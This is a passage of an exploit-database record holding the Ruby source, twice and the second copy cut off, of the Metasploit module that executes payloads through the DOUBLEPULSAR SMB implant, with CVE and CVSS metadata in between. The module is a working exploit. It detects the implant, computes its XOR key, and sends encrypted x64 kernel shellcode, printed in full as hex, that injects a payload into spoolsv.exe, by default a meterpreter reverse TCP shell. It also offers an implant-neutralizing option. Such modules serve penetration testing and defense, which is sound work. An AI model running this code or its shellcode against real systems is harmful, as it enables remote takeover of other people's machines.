Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 
0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n 
CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n 
print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n 
pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n 
\"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n 
\"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def 
kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2019-12-04] #"}, "lastseen": "2019-12-04T03:58:12", "differentElements": ["cvss2", "cvss3", "reporter", "sourceData", "title"], "edition": 1}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "e709376f2108634253e243227abda9cd", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit\n", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", 
"CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-01T13:26:49", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142603", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-27803", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "seebug", "idList": 
["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96707", "SMNTC-96705", "SMNTC-96706", "SMNTC-96709", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": 
["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}], "modified": "2019-12-04T03:58:12", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2019-12-04T03:58:12", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 
'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is 
